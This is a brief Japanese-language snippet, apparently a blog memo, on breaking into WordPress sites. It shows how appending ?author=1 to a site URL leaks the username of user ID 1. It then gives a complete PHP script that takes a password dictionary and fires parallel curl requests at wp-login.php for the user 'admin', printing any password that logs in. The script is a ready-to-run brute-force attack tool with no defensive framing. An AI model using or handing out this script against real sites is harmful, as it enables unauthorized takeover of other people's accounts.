WordPressのURLに?author=1をつけると、ユーザID1のユーザ名を取得できる
http://example.com/?author=1
http://example.com/author/admin
ログイン画面
http://example.com/wp-login.php
$time = microtime(true);
const TARGET_URL = 'http://example.com/wp-login.php';
const USER_AGENT = 'Mozilla/5.0';
const DICTIONARY = 'password';
const TIMEOUT = 30;
$log = 'admin';
$hit_flag = false;
try {
$mh = curl_multi_init();
$pwds = file(DICTIONARY, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$meta = stream_get_meta_data($fp = tmpfile());
foreach($pwds as $pwd) {
$ch = curl_init();
$chs[] = $ch;
curl_setopt_array($ch, [
CURLOPT_URL => TARGET_URL,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query(['log'=> $log, 'pwd' => $pwd]),
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_RETURNTRANSFER => false,
CURLOPT_COOKIEJAR => $meta['uri'],
CURLOPT_COOKIEFILE => $meta['uri'],
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => USER_AGENT,
CURLOPT_ENCODING => 'gzip',
CURLOPT_TIMEOUT => TIMEOUT,
CURLOPT_CONNECTTIMEOUT => TIMEOUT
]);
curl_multi_add_handle($mh, $ch);
}
do {
curl_multi_exec($mh, $active);
curl_multi_select($mh);
} while ($active > CURLM_OK);
foreach($chs as $idx => $ch) {
if (curl_getinfo($ch, CURLINFO_EFFECTIVE_URL) !== TARGET_URL){
$hit_flag = true;
echo "The password is \"{$pwds[$idx]}\".\n";
}
curl_multi_remove_handle($mh, $ch);
curl_close($ch);
}
curl_multi_close($mh);
} catch (exception $e) {
echo $e->getMessage();
}
if (!$hit_flag) echo "Did not hit.\n";
$time = microtime(true) - $time;
echo "It took ${time} seconds.\n";
